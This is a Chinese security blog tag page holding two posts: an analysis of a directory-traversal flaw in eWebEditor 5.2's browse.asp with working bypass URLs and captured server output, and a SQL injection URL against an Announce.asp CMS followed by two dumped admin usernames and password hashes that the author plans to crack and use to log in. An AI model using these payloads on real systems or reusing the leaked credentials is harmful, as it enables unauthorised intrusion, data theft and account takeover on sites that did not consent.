asp--st0p's blog

Posts Tagged ‘asp’

ewebeditor 5.2 列目录漏洞

84 Comments | This entry was posted on Jun 25 2009

作者:st0p
由于自己做站用的编辑器是以前自己精简的ewebeditor 5.2 asp版本,干活累了,想休息一下,就分析了一个这个编辑器,没想到,还真让我发现了一个小漏洞,虽然作用不大,不过用来辅助还是蛮不错的.
出现漏洞的文件存在于ewebeditor/asp/browse.asp

Function GetList()
	Dim s_List, s_Url
	s_List = ""
	Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
	'Response.Write sCurrDir
	'On Error Resume Next
	Set oFSO = Server.CreateObject("Scripting.FileSystemObject")	
	Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir)) 
	'注意一下sCurrDir变量,这个值等下我们可以用到
	If Err.Number>0 Then
		s_List = ""
		Exit Function
	End If
 
	If sDir <> "" Then
		If InstrRev(sDir, "/") > 1 Then
			s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
		Else
			s_Url = ""
		End If
 
		s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
			"<td><img border=0 src='../sysimage/file/parentfolder.gif'></td>" & _
			"<td>..</td>" & _
			"<td>&nbsp;</td>" & _
			"</tr>"
	End If
	'Response.Write sDir&"!"&s_List
 
	Dim oSubFolder
	For Each oSubFolder In oUploadFolder.SubFolders
		'Response.Write oUploadFolder.SubFolders
		If sDir = "" Then
			s_Url = oSubFolder.Name
		Else
			s_Url = sDir & "/" & oSubFolder.Name
		End If
		s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
			"<td><img border=0 src='../sysimage/file/closedfolder.gif'></td>" & _
			"<td noWrap>" & oSubFolder.Name & "</td>" & _
			"<td>&nbsp;</td>" & _
			"</tr>"
	Next
	'Response.Write s_List
 
	Set oUploadFiles = oUploadFolder.Files
 
	For Each oUploadFile In oUploadFiles
		'Response.Write oUploadFile.Name
		sFileName = oUploadFile.Name
		If CheckValidExt(sFileName) = True Then 
		'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
			If sDir = "" Then
				s_Url = sContentPath & sFileName
			Else
				s_Url = sContentPath & sDir & "/" & sFileName
			End If
 
			s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' url='" & s_Url & "'>" & _
					"<td>" & FileName2Pic(sFileName) & "</td>" & _
					"<td noWrap>" & sFileName & "</td>" & _
					"<td align=right>" & GetSizeUnit(oUploadFile.size) & "</td>" & _
					"</tr>"
		End If
	Next
	Set oUploadFolder = Nothing
	Set oUploadFiles = Nothing
	'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
 
	If sDir = "" Then
		s_Url = ""
		's_Url = "/"
	Else
		s_Url = "/" & sDir & ""
		's_Url = "/" & sDir & "/"
	End If
 
	s_List = s_List & "</table>"
	s_List =  HTML2JS(s_List)
	'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
	s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
	GetList = s_List
End Function
'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
Function CheckValidExt(s_FileName)
	If sAllowExt = "" Then
		CheckValidExt = True
		Exit Function
	End If
 
	Dim i, aExt, sExt
	sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
	CheckValidExt = False
	aExt = Split(LCase(sAllowExt), "|")
	For i = 0 To UBound(aExt)
		If aExt(i) = sExt Then
			CheckValidExt = True
			Exit Function
		End If
	Next
End Function
'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的
Sub InitParam()
	sType = UCase(Trim(Request.QueryString("type")))
	sStyleName = Trim(Request.QueryString("style"))
 
	Dim i, aStyleConfig, bValidStyle
	bValidStyle = False
	For i = 1 To Ubound(aStyle)
		aStyleConfig = Split(aStyle(i), "|||")
		If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
			bValidStyle = True
			Exit For
		End If
	Next
 
	If bValidStyle = False Then
		OutScript("alert('Invalid Style.')")
	End If
 
	sBaseUrl = aStyleConfig(19)
	'nAllowBrowse = CLng(aStyleConfig(43))
	nAllowBrowse = 1
 
	If nAllowBrowse <> 1 Then
		OutScript("alert('Do not allow browse!')")
	End If
 
	sUploadDir = aStyleConfig(3)
	If Left(sUploadDir, 1) <> "/" Then
		Select Case sType
		Case "REMOTE"
			sUploadDir = "../../" & sUploadDir & "Image/"
		Case "FILE"
			sUploadDir = "../../" & sUploadDir & "Other/"
		Case "MEDIA"
			sUploadDir = "../../" & sUploadDir & "Media/"
		Case "FLASH"
			sUploadDir = "../../" & sUploadDir & "Flash/"
		Case Else
			sUploadDir = "../../" & sUploadDir & "Image/"
		End Select
	End If
	'sUploadDir =sUploadDir &"/"
 
	Select Case sBaseUrl
	Case "0"
		'sContentPath = aStyleConfig(23)
		Select Case sType
		Case "REMOTE"
			sContentPath = "../" & aStyleConfig(3) & "Image/"
		Case "FILE"
			sContentPath = "../" & aStyleConfig(3) & "Other/"
		Case "MEDIA"
			sContentPath = "../" & aStyleConfig(3) & "Media/"
		Case "FLASH"
			sContentPath = "../" & aStyleConfig(3) & "Flash/"
		Case Else
			sContentPath = "../" & aStyleConfig(3) & "Image/"
		End Select
	Case "1"
		sContentPath = RelativePath2RootPath(sUploadDir)
	Case "2"
		sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
	End Select
 
	Select Case sType
	Case "REMOTE"
		sAllowExt = aStyleConfig(10)
	Case "FILE"
		sAllowExt = aStyleConfig(6)
	Case "MEDIA"
		sAllowExt = aStyleConfig(9)
	Case "FLASH"
		sAllowExt = aStyleConfig(7)
	Case Else
		sAllowExt = aStyleConfig(8)
	End Select
 
	sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址
	sDir = Trim(Request("dir")) '得到dir变量
	sDir = Replace(sDir, "\", "/") '对dir变量进行过滤
	sDir = Replace(sDir, "../", "")
	sDir = Replace(sDir, "./", "")
	If sDir <> "" Then
		If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
			sCurrDir = sUploadDir & sDir & "/" 
			'重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了
                        '虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用st0p会在下面的利用中给出
		Else
			sDir = ""
		End If
	End If
 
End Sub

嘿嘿,看到这你应该明白了,其实就是对dir过滤的问题,我们完全可以构造特殊的值来跳过验证,这样就可以得到目录结构和显示设置文件中允许的文件后缀的文件了..
利用方法如下

http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/..

由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了.
嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了吗,里面就有你根目录的目录名字了.
嘿嘿,他根目录下有个guest目录,我们通过下面的地址可以列出他下面的结构

http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/...././/guest

然后我们也可以通过

http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/../...././/..

可以往更上层跳,我测试的那个虚拟主机,得到的是www,logfile,datebase这三个目录.

<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>parent.setDirList("<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../..'><td><img border=0 src='../sysimage/file/parentfolder.gif'></td><td>..</td><td>&nbsp;</td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../logfiles'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>logfiles</td><td>&nbsp;</td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../www'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>www</td><td>&nbsp;</td></tr></table>", "/../../..")</script></body></html>

这个漏洞只能算是在入侵检测的时候辅助使用,可以得到目录结构,比如说更改了管理目录了,数据库目录了,这样就可以得到目录名字了,不过没法列出文件就让st0p郁闷了,唉....
这是st0p在blog上发的第二篇原创文件,以后会多发一些的,嘎,现在也算blog开张了..
注意：网址中跳目录用到的全是.我发现前台会被替换掉

asp, ewebeditor, 列目录, 漏洞

学·武功秘籍

http://www.st0p.org/Announce.asp?id=2&ChannelID=-1)%20and%20(1=2)%20union%20select%20id,username,password,Purview,LastLoginTime,LastLoginIP,LoginTimes,AdminPurview_Article%20from%20admin%20union%20select%20*%20from%20Announce%20%20where%20(1=2嘿嘿，这站上面有两上管理员信息，全部列了出来

帐户：adminB
密码：49ba59abbe56e057

帐户：admin
密码：d9a65233eab47930

有了这些信息，我们就可以去破解MD5,然后进行登陆了，记录一下，以后备用。这也是st0p在新blog发布的第一篇原创日志。

Announce.asp, asp, CMS, sql inject, 动力, 注入

学·武功秘籍

st0p's blog

孤高之路不可走,一时的弱者,不是一辈子的弱者!

Login

Categories

Archives

Links

Posts Tagged ‘asp’

ewebeditor 5.2 列目录漏洞

动力Announce.asp注入利用